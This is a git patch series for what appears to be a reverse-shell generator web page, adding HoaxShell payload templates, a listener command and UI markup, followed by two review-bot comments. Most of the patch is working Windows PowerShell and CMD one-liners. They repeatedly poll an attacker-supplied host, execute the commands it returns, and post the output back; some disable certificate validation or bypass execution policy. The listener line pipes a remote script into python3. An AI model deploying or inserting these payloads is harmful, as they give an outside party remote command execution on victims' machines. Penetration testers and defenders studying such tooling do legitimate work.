From a3bdc150ff62bfe3dd704de3e5451a93179ae745 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Wed, 15 Feb 2023 21:02:38 +0100 Subject: [PATCH 1/8] Update data.js --- js/data.js | 68 ++++++++++++++++++++++++++++++++++++++++++++++++++---- 1 file changed, 64 insertions(+), 4 deletions(-) diff --git a/js/data.js b/js/data.js index 7cb152f..bbfedf5 100644 --- a/js/data.js +++ b/js/data.js @@ -2,7 +2,8 @@ const CommandType = { 'ReverseShell': 'ReverseShell', 'BindShell': 'BindShell', - 'MSFVenom': 'MSFVenom' + 'MSFVenom': 'MSFVenom', + 'HoaxShell': 'HoaxShell' }; const withCommandType = function (commandType, elements) { 
@@ -471,11 +472,68 @@ const msfvenomCommands = withCommandType( ] ); + +const hoaxShellCommands = withCommandType( + CommandType.HoaxShell, + [ + { + "name": "Windows CMD cURL http", + "command": "", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX http", + "command": "$s='{IP}:{PORT}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX Constr Lang Mode http", + "command": "$s='{IP}:{PORT}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile http", + "command": "$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 
0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile Constr Lang Mode http", + "command": "$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "Windows CMD cURL https", + "command": "", + "meta": ["windows"] + }, + { + "name": "PowerShell IEX https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Constr Lang Mode IEX https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool 
CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile https", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "meta": ["windows"] + }, + { + "name": "PowerShell Outfile Constr Lang Mode https", + "command": "add-type @\"\nusing System.Net;using 
System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "meta": ["windows"] + } + ] +); + const rsgData = { listenerCommands: [ ['nc', 'nc -lvnp {port}'], - ['busybox nc', 'busybox nc -lp {port}'], + ['busybox nc', 'busybox nc -lp {port}'], ['ncat', 'ncat -lvnp {port}'], ['ncat.exe', 'ncat.exe -lvnp {port}'], ['ncat (TLS)', 'ncat --ssl -lvnp {port}'], @@ -487,7 +545,8 @@ const rsgData = { ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'], ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['powercat', 'powercat -l -p {port}'], - ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'] + ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'], + ['hoaxshell', 'sudo python3 -c $(curl -s ) -t {payload}'] ], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'], 
@@ -501,7 +560,8 @@ const rsgData = { reverseShellCommands: [ ...reverseShellCommands, ...bindShellCommands, - ...msfvenomCommands + ...msfvenomCommands, + ...hoaxShellCommands ] } From b5b4b01c86d9b00a519027a3a5ed45b15751b4c2 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Wed, 15 Feb 2023 21:26:57 +0100 Subject: [PATCH 2/8] Update index.html --- index.html | 64 ++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 64 insertions(+) diff --git a/index.html b/index.html index 8a6bc93..c7035c4 100644 --- a/index.html +++ b/index.html @@ -192,6 +192,10 @@ MSFVenom + + + +
+
+
+ +
+
+ +
+
+ +
+
+ + +
+ + +
+
+
🚀
+

+                                            
+
+ +
+ + + + + + + + +
+
+ +
+
+
+
+
From bc9d73f581f67e30ac57ad83d06c4c3a1cde36aa Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Thu, 16 Feb 2023 17:34:21 +0100 Subject: [PATCH 3/8] Added HoaxShell --- index.html | 31 ++++++++++++------------------- 1 file changed, 12 insertions(+), 19 deletions(-) diff --git a/index.html b/index.html index c7035c4..89d2662 100644 --- a/index.html +++ b/index.html @@ -193,8 +193,8 @@ aria-controls="msfvenom" aria-selected="false">MSFVenom + +
@@ -460,7 +461,7 @@
- +
@@ -482,21 +483,12 @@
- - - - + +
- +
+
From d3248454bc15aee8092e7a21f7dd5b188c224f10 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Thu, 16 Feb 2023 17:35:30 +0100 Subject: [PATCH 4/8] Added HoaxShell --- js/data.js | 49 ++++++++++++++++++++++++++++++++----------------- 1 file changed, 32 insertions(+), 17 deletions(-) diff --git a/js/data.js b/js/data.js index bbfedf5..bad3d2b 100644 --- a/js/data.js +++ b/js/data.js 
@@ -477,53 +477,53 @@ const hoaxShellCommands = withCommandType( CommandType.HoaxShell, [ { - "name": "Windows CMD cURL http", - "command": "", + "name": "Windows CMD cURL", + "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL", "meta": ["windows"] }, { - "name": "PowerShell IEX http", - "command": "$s='{IP}:{PORT}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "name": "PowerShell IEX", + "command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", "meta": ["windows"] }, { - "name": "PowerShell IEX Constr Lang Mode http", - "command": "$s='{IP}:{PORT}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers 
@{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "name": "PowerShell IEX Constr Lang Mode", + "command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", "meta": ["windows"] }, { - "name": "PowerShell Outfile http", - "command": "$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "name": "PowerShell Outfile", + "command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri 
$p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", "meta": ["windows"] }, { - "name": "PowerShell Outfile Constr Lang Mode http", - "command": "$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "name": "PowerShell Outfile Constr Lang Mode", + "command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", "meta": ["windows"] }, { "name": "Windows CMD cURL https", - "command": "", + "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! 
--data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL", "meta": ["windows"] }, { "name": "PowerShell IEX https", - "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", "meta": ["windows"] }, { "name": "PowerShell Constr Lang Mode 
IEX https", - "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", "meta": ["windows"] }, { "name": "PowerShell Outfile https", - "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint 
srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}", "meta": ["windows"] }, { "name": "PowerShell Outfile Constr Lang Mode https", - "command": "add-type 
@\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{IP}:{PORT}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", + "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}", "meta": ["windows"] } ] 
@@ -546,7 +546,7 @@ const rsgData = { ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'], ['powercat', 'powercat -l -p {port}'], ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'], - ['hoaxshell', 'sudo python3 -c $(curl -s ) -t {payload}'] + ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}'] ], shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'], @@ -563,7 +563,22 @@ const rsgData = { ...msfvenomCommands, ...hoaxShellCommands ] -} +}; + +const hoaxshell_listener_types = { + + "Windows CMD cURL" : "cmd-curl", + "PowerShell IEX" : "ps-iex", + "PowerShell IEX Constr Lang Mode" : "ps-iex-cm", + "PowerShell Outfile" : "ps-outfile", + "PowerShell Outfile Constr Lang Mode" : "ps-outfile-cm", + "Windows CMD cURL https" : "cmd-curl -c /your/cert.pem -k /your/key.pem", + "PowerShell IEX https" : "ps-iex -c /your/cert.pem -k /your/key.pem", + "PowerShell IEX Constr Lang Mode https" : "ps-iex-cm -c /your/cert.pem -k /your/key.pem", + "PowerShell Outfile https" : "ps-outfile -c /your/cert.pem -k /your/key.pem", + "PowerShell Outfile Constr Lang Mode https" : "ps-outfile-cm -c /your/cert.pem -k /your/key.pem" + +}; // Export the data for use within netlify functions / node if (typeof exports !== 'undefined') { From be35cc480fa05d9d52535cdd60f3d2a3eed77fc0 Mon Sep 17 00:00:00 2001 From: Panagiotis Chartas Date: Thu, 16 Feb 2023 17:36:26 +0100 Subject: [PATCH 5/8] Added HoaxShell --- js/script.js | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) diff --git a/js/script.js b/js/script.js index e9d1a41..da6ef86 100644 --- a/js/script.js +++ b/js/script.js 
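Review bot: The new `hoaxshell` entry in `listenerCommands` downloads `hoaxshell-listener.py` from the mutable `main` branch and passes it straight to `python3 -c`, with no integrity check. Whoever copies this line runs whatever that branch holds at that moment, so a later push or a compromised upstream account changes what executes on the operator's workstation. Pin the URL to a reviewed commit by replacing `main` with `<REVIEWED_COMMIT_SHA>` (placeholder), or show a two-step form that saves the file so it can be read and checksum-verified before it is run. `curl -s` also hides transfer errors, so adding `-f` (`curl -fsS`) would let an HTTP error fail the command instead of passing the error page to the interpreter.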
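Review bot: The key `"PowerShell IEX Constr Lang Mode https"` in `hoaxshell_listener_types` does not match the entry it is meant to describe, because an unchanged context line in this same patch still names that command `"PowerShell Constr Lang Mode IEX https"`. A lookup by command name therefore yields `undefined` for that entry. Rename the data entry to follow its siblings or change the key. Storing the listener type as a field on each command object (for example `"listenerType": "ps-iex-cm"`) would remove the duplicated name strings and the chance of drift. The identifier is also snake_case while the rest of the file uses camelCase (`hoaxShellCommands`, `rsgData`).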
